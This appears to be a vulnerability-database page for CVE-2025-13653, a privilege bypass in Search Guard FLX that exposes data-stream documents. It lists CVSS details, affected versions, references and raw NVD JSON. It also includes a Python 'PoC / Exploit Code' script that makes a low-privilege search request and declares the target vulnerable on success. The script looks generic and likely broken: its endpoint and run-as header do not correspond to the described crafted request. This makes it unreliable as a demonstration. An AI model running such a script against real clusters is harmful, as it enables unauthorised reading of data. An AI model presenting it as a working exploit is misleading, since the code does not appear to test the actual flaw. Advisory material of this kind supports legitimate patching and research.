Security Vulnerability Report
CVE-2025-13653 CVSS 4.3 MEDIUM

CVE-2025-13653

Published: 2025-12-01 18:16:03
Last Modified: 2026-04-15 00:35:42

Description

In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Search Guard FLX 3.1.0
Search Guard FLX 3.2.0
Search Guard FLX 3.3.0
Search Guard FLX 3.4.0
Search Guard FLX 3.5.0
Search Guard FLX 4.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-13653 PoC - Search Guard FLX Privilege Bypass
# Affected versions: Search Guard FLX 3.1.0 - 4.0.0 (with enterprise modules disabled)
# This PoC demonstrates unauthorized data stream document access
import requests
from requests.auth import HTTPBasicAuth

TARGET = "https://<elasticsearch-host>:9200"
USERNAME = "low_privilege_user"
PASSWORD = "user_password"
DATA_STREAM_NAME = "sensitive-data-stream"

headers = {
    "Content-Type": "application/json",
    "es-security-runas-user": USERNAME
}
auth = HTTPBasicAuth(USERNAME, PASSWORD)

print("[*] Testing CVE-2025-13653 - Search Guard FLX Privilege Bypass")
print(f"[*] Target: {TARGET}")
print(f"[*] User: {USERNAME}")
print(f"[*] Data Stream: {DATA_STREAM_NAME}")

# Attempt to read documents from protected data stream
endpoint = f"{TARGET}/_data_stream/{DATA_STREAM_NAME}/_search"

try:
    response = requests.get(endpoint, headers=headers, auth=auth, verify=False, timeout=10)
    print(f"\n[+] Status Code: {response.status_code}")
    if response.status_code == 200:
        data = response.json()
        if "hits" in data:
            print("[!] VULNERABLE: Successfully accessed data stream without proper privileges")
            print(f"[!] Documents retrieved: {len(data['hits']['hits'])}")
        else:
            print("[*] Response received but format unexpected")
    elif response.status_code == 403:
        print("[+] SECURE: Access denied (expected behavior)")
    else:
        print(f"[*] Unexpected status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")
```

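References

https://docs.search-guard.com/latest/changelog-searchguard-flx-4_0_1
https://search-guard.com/cve-advisory/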

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13653", "sourceIdentifier": "[email protected]", "published": "2025-12-01T18:16:02.707", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Search Guard FLX versions from 3.1.0 up to 4.0.0 with enterprise modules being disabled, there exists an issue which allows authenticated users to use specially crafted requests to read documents from data streams without having the respective privileges."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://docs.search-guard.com/latest/changelog-searchguard-flx-4_0_1", "source": "[email protected]"}, {"url": "https://search-guard.com/cve-advisory/", "source": "[email protected]"}]}}